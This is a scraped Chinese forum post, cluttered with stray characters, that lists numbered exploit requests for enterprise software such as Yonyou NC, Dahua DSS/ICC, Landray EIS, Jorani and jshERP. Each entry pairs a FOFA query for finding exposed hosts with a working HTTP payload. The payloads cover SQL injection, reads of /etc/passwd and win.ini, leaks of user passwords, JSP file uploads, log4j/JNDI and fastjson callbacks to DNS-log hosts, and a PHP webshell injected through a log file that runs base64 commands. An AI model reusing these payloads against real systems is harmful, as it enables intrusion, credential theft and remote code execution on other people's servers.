! W+ V  G8 a1 H& B7 z$ N( e
. {/ v) c! G- P+ i/ n; l1 R11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
# f% f0 ]; `6 g  \FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
1 l+ k& W( U2 W+ _: BGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
6 W, E1 A, J+ {& v- `Host: 127.0.0.1
1 n9 |; {; E: z$ x6 f; vPragma: no-cache
8 w8 j- w. H; a7 a$ n0 l7 _* mCache-Control: no-cache- v6 j6 J7 `8 g* ?/ k; q/ F
Upgrade-Insecure-Requests: 1/ ?8 q* g) W: p5 v3 g" k  L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
8 E; L/ r  {0 t3 L! eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( Y( e) p7 k8 w& i3 v) e; A+ ^1 ^5 l
Accept-Encoding: gzip, deflate
5 h- v; \0 M" A2 o" L8 SAccept-Language: zh-CN,zh;q=0.9,en;q=0.8- t# k0 O/ w! ]1 e- H$ _
Connection: close. K3 n. o* T' j& b/ P& D! I3 {9 m

6 `( j( o2 C4 L( G; n; p% ]; O- C, M% a
12. Jorani < 1.0.2 远程命令执行- Z) ?) _* X" J$ ~* o) n
FOFA:title="Jorani"7 h; y3 _  R. T. c  U9 P$ P
第一步先拿到cookie
& K4 m+ \: j+ j1 y5 j: `% nGET /session/login HTTP/1.1
5 r+ _6 X: p- `3 c' ~" ZHost: 192.168.190.30; i" N3 N  `, P' g1 K  \/ a
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.364 ^8 ^. D5 x/ @" g0 q
Connection: close% {! f: E4 X) Z; |
Accept-Encoding: gzip
! \# F0 _) f4 k$ R# }5 N
# z  G* T2 G4 {; B) i; S) w# F5 N5 d) ^( h  _
响应中csrf_cookie_jorani用于后续请求
7 |0 j- S' k2 E2 DHTTP/1.1 200 OK
, u# |8 S2 {2 WConnection: close# a4 k) W& K' T- O
Cache-Control: no-store, no-cache, must-revalidate! V$ ]& ]- `0 ~; z8 n; b
Content-Type: text/html; charset=UTF-80 a  L  {8 \# I- _
Date: Tue, 24 Oct 2023 09:34:28 GMT  m; F) c* V8 a  \
Expires: Thu, 19 Nov 1981 08:52:00 GMT
6 p6 x( B0 [+ G3 @Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
: b' z$ L& O5 b  c/ @Pragma: no-cache
' g# O: R: w- C# j! {% `% N' KServer: Apache/2.4.54 (Debian)* ^* I4 d2 G* }1 N4 ^
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/7 P6 Y" N. u5 U6 g* w
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly, P, E' e- t, c( w: r
Vary: Accept-Encoding
1 P/ T. }( v% K1 I+ J: H* a  s4 w; d0 g) ?
" c3 |( }  M7 y& d
POST请求,执行函数并进行base64编码3 E* \% z0 @; a% o8 U
POST /session/login HTTP/1.1! p; U' @' H5 C6 Y( a( R1 b+ i# V
Host: 192.168.190.30
9 r) X' e* X  h4 @# L. v6 t6 r) Q: HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
7 R* V: v8 U  u5 l; M2 x0 VConnection: close
9 q3 l& u4 h5 l: fContent-Length: 252  l6 Y+ V  \+ q2 I0 U" \
Content-Type: application/x-www-form-urlencoded
! a" a+ X3 }4 }5 ]  pCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r0 z8 e  {# |6 B$ P7 Q0 j( Q2 Z
Accept-Encoding: gzip
; X3 S) x" a% m: F& y! V
: K3 G* I8 m& Icsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
3 l/ N. P2 P/ O7 U* _/ y. V& y
) W. |3 u: e3 J; u  X7 V$ S1 n9 w. k* Y  e

; \) r6 s4 x/ s9 j$ r' _& l向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
" c( q7 Q& V! \6 N+ Y: lGET /pages/view/log-2023-10-24 HTTP/1.1
8 ^4 @  a4 t% H0 ~) fHost: 192.168.190.30
! x9 {, W3 r. l9 v) yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
5 m. r7 H, o6 \1 I  y9 F8 G! yConnection: close
. F$ j6 @& V) \Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r+ x; J' e: ?0 h' v$ v( S
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=4 @( _1 v7 U& n& ]( C
X-REQUESTED-WITH: XMLHttpRequest
% c4 N6 g' d/ A: L: uAccept-Encoding: gzip/ S3 U% A& _+ {' F
9 q1 G+ Z" R2 H2 A# S

' B: ~( j( Y! ?- ?# e- I. C2 b0 S1 z13. 红帆iOffice ioFileDown任意文件读取
! l; O9 ~% E$ B, [9 kFOFA:app="红帆-ioffice"
' |+ p3 w2 }6 |" x8 RGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
! L) L5 T6 v# h9 z3 G' q4 b  HHost: x.x.x.x5 _( m5 l6 a3 Z; X9 r- g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
* |1 Y, Y% u; N2 |Connection: close) }+ _3 _( J6 l7 n
Accept: */*
4 r* v/ E4 p" t9 OAccept-Encoding: gzip
( `; X* m. k6 u: D2 e) G& c1 z0 A5 q" |

$ d6 x3 V% c9 ~! `* L+ [14. 华夏ERP(jshERP)敏感信息泄露
8 L- F" {3 L6 C1 mFOFA:body="jshERP-boot"
" k+ k/ t' d' Z, v3 k# {泄露内容包括用户名密码
9 E* c+ S( V$ j& |2 i. FGET /jshERP-boot/user/getAllList;.ico HTTP/1.19 x2 J- Y4 Q6 x# S# p
Host: x.x.x.x
7 O+ n2 W% q  t7 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
9 C3 F( W' S1 A" y7 PConnection: close
6 @% @- r6 {% z5 K0 K' gAccept: */*
' f1 M- Q7 D$ K8 d5 I" ~, }Accept-Language: en
  |: A' C# `9 E! I+ b8 ]6 pAccept-Encoding: gzip' J1 E5 f# O( J3 }

) z. k) R& O1 q, t9 u; p' T5 Z* }& r2 [0 I7 j
15. 华夏ERP getAllList信息泄露, j  C! Q( F: c' p3 y
CVE-2024-0490! c! G# ]* {  C8 B+ R% T/ W# z
FOFA:body="jshERP-boot"
/ Y6 k' E% {5 W1 h, W. r* I# Q泄露内容包括用户名密码
/ g2 p2 r0 Z4 J( |/ ZGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
+ K7 B3 ]- r. f0 mHost: 192.168.40.130:100
9 f! h, O* r  u$ a3 h9 A$ O6 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36% _3 C7 o& ]. w5 G$ W! }/ E
Connection: close$ U5 G% T+ `  ]4 e! b& Z' S
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8+ |- h+ e7 `- _  J
Accept-Language: en
8 p; q+ K* S1 gsec-ch-ua-platform: Windows
3 O5 E2 x3 t' B" CAccept-Encoding: gzip
2 M) W) O, f. C+ i3 N
* y/ `0 V2 R: x  P( {1 K! _6 U. l0 b+ J) S7 p+ |
16.  红帆HFOffice医微云SQL注入
: T* H+ G% F6 A7 {FOFA:title="HFOffice"6 g4 O( o0 b, m
poc中调用函数计算1234的md5值
; W/ {* |, b. u0 i$ R2 MGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
0 P; m$ q" F. Q& @Host: x.x.x.x6 |3 N- J  X& r$ |7 c/ k
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
+ c, X5 N8 ^0 V: r9 \Connection: close
, W8 {* d2 J1 MAccept: */*. q! b  s% f$ K0 U! e* M* O# x
Accept-Language: en
* B7 ~' P4 K: eAccept-Encoding: gzip
* f, g6 J6 E$ d% K# j% e
4 c% m9 o- T7 s- v2 v
6 y* S) R/ V) @- |  j17. 大华 DSS itcBulletin SQL 注入
0 M' V) G5 D5 Y7 [6 c' B" SFOFA:app="dahua-DSS"* `) h. L1 `2 I
POST /portal/services/itcBulletin?wsdl HTTP/1.1
3 B5 B: k* M* f1 X0 mHost: x.x.x.x
, H6 U( `% S1 d: h, JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ A8 W, X# X) v# h& W( d
Connection: close
' ?3 D3 o, v# R) m2 O* DContent-Length: 345+ M2 |2 `- y. t  Q+ v4 [* z
Accept-Encoding: gzip
+ Q, ^& e9 z, r& Q$ I# E
1 }2 H$ l! b8 m7 p4 P<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
- Z1 y' i) W* b, y+ R1 x  G<s11:Body>
5 k6 s( d! N! n2 l" E    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>: q4 d1 q0 R* m8 s
      <netMarkings>$ G5 C5 j! i8 O& V: o1 W
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1. i1 e1 P4 T/ I3 d
      </netMarkings>+ G  O2 X1 t5 s; s  T" s1 ~
    </ns1:deleteBulletin>: m3 l/ {. c  W# u5 F& i
  </s11:Body>' m, J! b2 C4 U" g
</s11:Envelope>! k; b& w/ J. X0 u+ k. P" a
. c5 ~- @4 ~6 w3 k( v/ @

' a4 h5 b/ h4 Y3 Q! @18. 大华 DSS 数字监控系统 user_edit.action 信息泄露; ~+ h0 g1 z: b8 U+ W5 k
FOFA:app="dahua-DSS"
, R0 F, _2 u; r8 MGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
2 H1 e, x( ^9 H+ T/ G5 K; QHost: your-ip  Z% ], @% y5 ]# |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 Q. }, ^4 e- J
Accept-Encoding: gzip, deflate
1 ^2 [0 x' O* lAccept: */*7 B( r# z( l! O& }+ S$ L
Connection: keep-alive/ m% w5 q5 M+ F- {+ s

# V! q7 _2 H* X" h/ C4 f! ]. P: ]) `8 z" H9 t* e  w5 }
) m, b  P$ G6 F" J
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入* B- i6 J: V4 i& i, [
FOFA:app="dahua-DSS"  U: M9 C/ b! j  e8 d5 D
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
/ W8 n' ?# R' m1 @- S) [7 P9 LHost:. i. U) s% o( n+ V# b4 T: k
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
$ ?7 F: s7 C  z8 K1 N, {1 `Accept-Encoding: gzip, deflate& N; a- a/ W% w
Accept: */*
" c  O( l7 {8 vConnection: keep-alive& ?( Z- X5 o) {

: Y  b& H/ d3 Q5 p& z0 O- d
0 U1 e9 |# R2 v& ?( Z20. 大华ICC智能物联综合管理平台任意文件读取
; L; Z1 T5 T! o9 q2 j5 q, k' W; XFOFA:body="*客户端会小于800*"
/ A/ Q! E# f7 `% DGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
" b3 i( ]+ X. ^; |. vHost: x.x.x.x
( x  A+ N2 Q8 e  V+ R8 }! lUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 E+ g5 Y$ q# s( G( ^* u, B
Connection: close+ B+ d0 d' J5 a# d9 |7 C
Accept: */*, ^4 ~5 d6 j. E6 ^- j0 v+ n
Accept-Language: en4 l: p* `; P# I+ U6 s7 k4 _
Accept-Encoding: gzip* n1 d4 j. i8 y* A- C

/ p9 i; ]" o# y6 Y1 O
3 [. ?3 ~9 R( T# B: Y  V2 D21. 大华ICC智能物联综合管理平台random远程代码执行
8 s, t! `( M3 q9 i5 tFOFA:icon_hash="-1935899595"
: G2 D6 _% V1 i1 z) BPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
, j, {1 A# w4 y/ P0 f0 l" D. }( OHost: x.x.x.x: |  O9 Q- n: s. D, X' j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; J7 {# _; l2 _Content-Length: 161
8 m* c  p& N& yAccept-Encoding: gzip
0 _; [8 S, h+ }& t2 v; x( HConnection: close
3 d1 Z" M7 v" i; o, N( \5 KContent-Type: application/json;charset=utf-86 v8 T2 Q2 _. V% b2 c
& m+ }' v8 f2 `" e+ V9 b* u
{. I) {& N1 E  F+ j! G. x  E8 d
"a":{0 H. ?9 v8 v/ e+ B
   "@type":"com.alibaba.fastjson.JSONObject",
& v0 Q! s. H! I. d* S    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
9 S& G2 M$ B0 t! V) T: C2 j# l  }""
+ @* A. y# D/ F2 \}9 p. ^  m+ y% J& }% Y

5 N, p; Q) t+ U$ W% q# s" |" d
5 }. m9 r5 C* d2 g+ S2 u22. 大华ICC智能物联综合管理平台 log4j远程代码执行
& m' ?- `: l' B/ {4 u+ t" I% p8 ^& WFOFA:icon_hash="-1935899595"( i" G$ G! u# N. [9 a/ b# e1 V
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1, ^2 }: d. s$ ^
Host: your-ip
$ c8 ?0 ]1 V5 x' XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) ?7 S) A7 ]0 l2 Y+ ^7 Y8 SContent-Type: application/json;charset=utf-8
3 g$ B! `1 f$ p* M8 A
% r% u6 b% K1 J& |{
. L0 i7 B  [, f. e: J( i+ ~( ]0 e"loginName":"${jndi:ldap://dnslog}"
& e8 Z; A# S9 h* M2 \}
6 D7 y1 y' k0 [' o& C3 p, I! Y1 F3 Z, B2 f! x
4 [. u4 s3 ~5 M, C* I) a# I/ @% }9 g
# x" Z7 M3 B: S: n
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行0 U" p; L! \* m$ d- U- f! o/ t
FOFA:icon_hash="-1935899595"! K0 \: E  {% |
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1& C& J: b+ j  `& T% t8 }
Host: your-ip) B: e: E4 C3 I/ ?  f8 t+ s* U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% w7 }6 `* m- Q- o0 z0 N- @+ u9 BContent-Type: application/json;charset=utf-8
$ W+ {% q, y* F: v. o/ }, YAccept-Encoding: gzip
) U- N# Q$ \' t+ d# L) e% L1 ZConnection: close
$ @* W0 n9 q( l' f
6 {6 y! h/ `, x+ Z) s{
, D3 ]* n4 C- i    "a":{
6 @% y6 a7 u& z% E% i& I  E9 d: @5 \        "@type":"com.alibaba.fastjson.JSONObject",$ f6 U: l. X! h- y, Y; h
       {"@type":"java.net.URL","val":"http://DNSLOG"}
/ @4 k: h7 r* H% `4 U; F        }""
" Q# I; {2 k5 C' J" ^}* G3 P# V9 }9 }

+ }: W5 y  V0 ^! T7 p1 v$ a) D
  X/ P+ y' l* B% Q( R8 `( K8 v24. 用友NC 6.5 accept.jsp任意文件上传
6 U! S+ ]. O/ u& E" @/ [6 k0 ~FOFA:icon_hash="1085941792"
* c/ k0 v8 s. z- d* \POST /aim/equipmap/accept.jsp HTTP/1.1
9 r0 s- i4 W; u8 m7 N7 lHost: x.x.x.x
% D- f, a# G5 o, s$ R8 BUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' P$ {. c# h* B* O/ `: K: ]
Connection: close
- m8 y0 w; [. D1 w9 P0 {Content-Length: 4492 p9 [& E$ V' g; ~1 |$ m
Accept: */*" [) f5 Y+ \% \0 B2 U8 |. I
Accept-Encoding: gzip
5 b% H1 e' g" PContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc/ o3 h  v6 [* ~' F/ B

1 |, j) j; i# X% S* }-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc- s9 }0 T- ]2 r
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
2 N- l. R# J, s5 _: NContent-Type: text/plain
& r& H7 f' Z. d. @
  c+ M0 e0 e0 e% M<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
4 R5 o9 ?5 l$ _. \4 ~2 ]-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc7 K: f8 {' h% Q! F& y& D
Content-Disposition: form-data; name="fname"! J* o2 o: v6 ~& M& S0 m  U
7 J/ L$ V3 b3 u3 B$ J
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
+ ~! r) I5 o, z* @2 m-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
( s% U7 K* K$ {/ U! \/ P/ y2 _, |. c6 G/ v
. q% o& a$ G+ y9 p9 A) R1 K/ \
25. 用友NC registerServlet JNDI 远程代码执行- Q9 I' V4 Q- r0 h. k8 c% T
FOFA:app="用友-UFIDA-NC"
2 h& H* k' \8 u6 J! fPOST /portal/registerServlet HTTP/1.19 E( H0 w/ R. E* t# E
Host: your-ip4 j2 b7 n8 ^; l) s8 k* C6 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0- \: ?% Q$ m* H5 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9( V; T1 T# n, p
Accept-Encoding: gzip, deflate
& `/ r( H' C+ p% a& m6 V0 ~Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
+ {7 E- X' ~( }3 c# l* n% V' G. JContent-Type: application/x-www-form-urlencoded
3 O8 i) }" L3 [! L3 a% B& r8 e" I- s$ P# }2 V
type=1&dsname=ldap://dnslog
$ U% O: s+ q* P& C9 @4 I+ o5 D6 K9 l" U

3 |% m0 ?8 [. f' n2 Q! h1 ~
) E' e- y1 a0 N( q8 y7 B6 d6 h26. 用友NC linkVoucher SQL注入
/ }0 Z% b) O/ N+ x3 Z. M% \$ SFOFA:app="用友-UFIDA-NC", U. h/ G& L5 A4 k3 x: o
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1( s$ N/ f3 R, P8 a
Host: your-ip
2 _4 e; k5 g0 c* p. |- f6 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& z  b7 K4 ?2 s  NContent-Type: application/x-www-form-urlencoded8 p5 w, w$ F0 e" t; w1 L% d3 l
Accept-Encoding: gzip, deflate) Y( J, q0 ]# D% _
Accept: */*1 K  h5 @; z* T$ _; E, {
Connection: keep-alive  z) @% j6 u# o5 m4 [# C3 p

7 P+ N5 z( g$ D- q
) g$ a5 A5 ]2 p3 ^" Y5 F) I27. 用友 NC showcontent SQL注入
1 i: N7 ]- W/ S$ c- RFOFA:icon_hash="1085941792"
( w% x% B+ ^3 _) N* ~) gGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
1 _4 O% f: @3 R( A0 u$ m3 R, hHost: your-ip
) Z2 W" Q5 N& E/ [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& Q+ w; a( ]& b2 UAccept-Encoding: identity) _4 Q/ L  Y+ h5 L1 t+ ^
Connection: close  u% u9 b! M* p! [! h
Content-Type: text/xml; charset=utf-8, N% x/ W* e+ L! b: ^* b3 u

# g9 h; j/ ^1 t& [; }
) L  p- C5 a/ p28. 用友NC grouptemplet 任意文件上传4 s7 l3 V5 I1 A3 q+ Y
FOFA:icon_hash="1085941792"
7 S/ f. x- x" B; \/ D( Y8 DPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.15 T, ?2 A& C: u- ]
Host: x.x.x.x
6 p/ A$ H5 ?+ e' Y7 V9 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36: S3 N4 s. z! i9 }
Connection: close. G  \" n0 }: t8 m
Content-Length: 268, A3 |* A4 c# G, M5 P$ b5 C& Y0 _
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
. X  {' {0 }5 K7 C& e& q; y* KAccept-Encoding: gzip
  V8 }- J! R4 e2 a  k. a7 q# K4 R9 |/ U: W9 l+ ?* o2 j6 c' A7 R
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk7 o2 `) \# B+ i
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
; {* ~6 Q. ?9 \- t. v& c0 wContent-Type: application/octet-stream' L$ ^3 Z: Q, ^" p4 G# K# O& T
& {% R3 Q4 A5 |: o0 @; d7 t) ]$ g
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>0 w! ~1 C7 n1 L& W: j3 E
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--, d7 Z; A0 w; L- \$ s

; `! F; D# F/ s6 L- K
/ t8 v2 p5 Z7 E/uapim/static/pages/nc/head.jsp
" _8 i$ p3 L4 h. I4 p- T! ?2 m3 D, @7 e  j  U4 d8 J# w
29. 用友NC down/bill SQL注入
9 A% I; ?9 G2 D" C! ZFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"3 H; m+ t, N4 \5 ^
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1" ]9 j8 e. P; X& u4 A+ Z- e
Host: your-ip
9 O$ ^8 \* w+ \( d6 v& XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 |2 \& z  [7 Q: p0 j8 l
Content-Type: application/x-www-form-urlencoded# N! a" {( p1 c- w1 ~% t
Accept-Encoding: gzip, deflate2 m8 R1 G/ g' l
Accept: */*- N; u( O) ]6 ?) y
Connection: keep-alive
( s6 m/ d! i$ L. S% S$ J
2 B- v- F$ w! [$ _+ t, d' h) ^2 e
30. 用友NC importPml SQL注入
- k1 l9 g# Z& g0 {; z" r) ?, NFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
% b- a7 A/ F9 C; l# CPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
% B* E* H' A+ {, F& x0 ?+ BHost: your-ip
, d' ]5 l6 t0 e. }0 aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
' \& l# ?3 J% [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
- h/ K7 g; `) E: @- T, B% }Connection: close6 a( ]3 |; U- u& G& r* U% v4 W
+ @" c3 O+ G" S. p/ \9 h
------WebKitFormBoundaryH970hbttBhoCyj9V
5 k; b2 e& L$ H0 o3 T: I. n& jContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
, ~' A+ \. j# S3 yContent-Type: image/jpeg3 `( }4 h4 p9 _' v$ U. a
------WebKitFormBoundaryH970hbttBhoCyj9V--+ P- v/ F5 x3 s; F, Z6 C/ |- S

& F0 {: }, T: c" n
1 |) g9 J& i% o3 L8 O9 m! p) m0 F31. 用友NC runStateServlet SQL注入
! i2 {" m3 F% V! @- f! \version<=6.5
# \8 Q1 e& _, `' lFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif". g  z" S- V' i  j* L
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
9 a, ]4 L, X) D! e! R* `Host: host. ^, j) l, [7 u' b' x7 `9 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
; y  ^7 ]6 G" v1 B, a# @Content-Type: application/x-www-form-urlencoded: U. o& W7 [6 \+ |; u' |# U1 U

7 }& m5 L6 `+ Z. O+ t$ p. C1 G6 d/ `% D" u- J1 X3 Q
32. 用友NC complainbilldetail SQL注入& {9 `& _* x  c/ E: B
version= NC633、NC65& d  K2 U$ m7 p/ x% G! h6 R6 j
FOFA:app="用友-UFIDA-NC"
+ }' e) r8 a4 [2 w0 U8 TGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.12 |3 O. G  ^" O* R2 d( s
Host: your-ip
2 a& z, I  h/ Q6 |& [1 r  [: sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" ]) C9 G5 I& F" N7 B1 P
Content-Type: application/x-www-form-urlencoded
) N; ^  }' W/ Q- A1 H0 w# R  aAccept-Encoding: gzip, deflate/ O9 A# D2 @+ R# }' |
Accept: */*
9 |( T) i3 B+ y) UConnection: keep-alive
9 V! Z6 [( V# Q+ E6 j- {9 U  g$ F( b8 f6 D; L+ g' S" \# I% a

: \" R- D% D) c( [" y/ f33. 用友NC downTax/download SQL注入
  B! r. p/ l* [* t( p6 {version:NC6.5FOFA:app="用友-UFIDA-NC"- X3 }" v, z9 U) s+ t! _
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1) \0 Y/ `" N8 X* W& I) o
Host: your-ip
# a4 ]: W. o5 }$ rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# N0 O$ V0 D# n# S9 T7 IContent-Type: application/x-www-form-urlencoded
* E% J- f  K% BAccept-Encoding: gzip, deflate& W& S4 d, L# t8 \
Accept: */*2 g- r' X& z' @, T5 ~$ [
Connection: keep-alive
' W, H; _' n2 \( _! w" H! b
# _) W4 U# r" V6 \* P# ?3 r, b; H- ?8 P4 p) |# }4 l+ |
34. 用友NC warningDetailInfo接口SQL注入
' r/ ]& X1 l4 G# {, z* SFOFA:app="用友-UFIDA-NC"
4 W  |6 l6 I$ gGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.15 M) G; K. C# e. M& Y  C1 }
Host: your-ip; @8 Q  h  i4 r& Q) A+ T) ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: Z0 B7 W+ ?  O/ g3 X$ F6 dContent-Type: application/x-www-form-urlencoded
) u, U9 W6 ?; e: qAccept-Encoding: gzip, deflate
* _" A$ `. R" \3 P- p1 LAccept: */*
" ?# d: B3 E3 ~0 r6 TConnection: keep-alive' z! E3 T0 C8 B

